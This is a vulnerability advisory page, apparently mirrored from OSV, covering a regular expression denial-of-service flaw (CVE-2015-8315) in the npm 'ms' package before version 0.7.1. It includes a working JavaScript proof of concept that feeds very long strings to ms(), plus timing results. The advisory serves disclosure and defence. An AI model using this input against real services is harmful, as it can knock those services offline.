Lucene search
GoogleOSV:GHSA-3FX5-FWVR-XRJGHistoryOct 24, 2017 - 6:33 p.m.
Regular Expression Denial of Service in ms
2017-10-2418:33:36
Google
osv.dev
12
EPSS
0.002
Percentile
51.9%
Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
Proof of Concept
var ms = require('ms');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
ms(genstr(process.argv[2], "5") + " minutea");
Results
Showing increase in execution time based on the input string.
$ time node ms.js 10000
real 0m0.758s
user 0m0.724s
sys 0m0.031s
$ time node ms.js 20000
real 0m2.580s
user 0m2.494s
sys 0m0.047s
$ time node ms.js 30000
real 0m5.747s
user 0m5.483s
sys 0m0.080s
$ time node ms.js 80000
real 0m41.022s
user 0m38.894s
sys 0m0.529s
Related
f5
f5
K46337613 : NodeJS vulnerability CVE-2015-8315
2019-11-25 00:00:00
cvelist
cvelist
CVE-2015-8315
2017-01-23 21:00:00
prion
prion
Design/Logic Flaw
2017-01-23 21:59:00
vulnrichment
vulnrichment
CVE-2015-8315
2017-01-23 21:00:00
debiancve
debiancve
CVE-2015-8315
2017-01-23 21:59:00
nodejs
nodejs
Regular Expression Denial of Service
2015-10-24 16:06:54
github
github
Regular Expression Denial of Service in ms
2017-10-24 18:33:36
nvd
nvd
CVE-2015-8315
2017-01-23 21:59:00
cve
cve
CVE-2015-8315
2017-01-23 21:59:00
ibm
ibm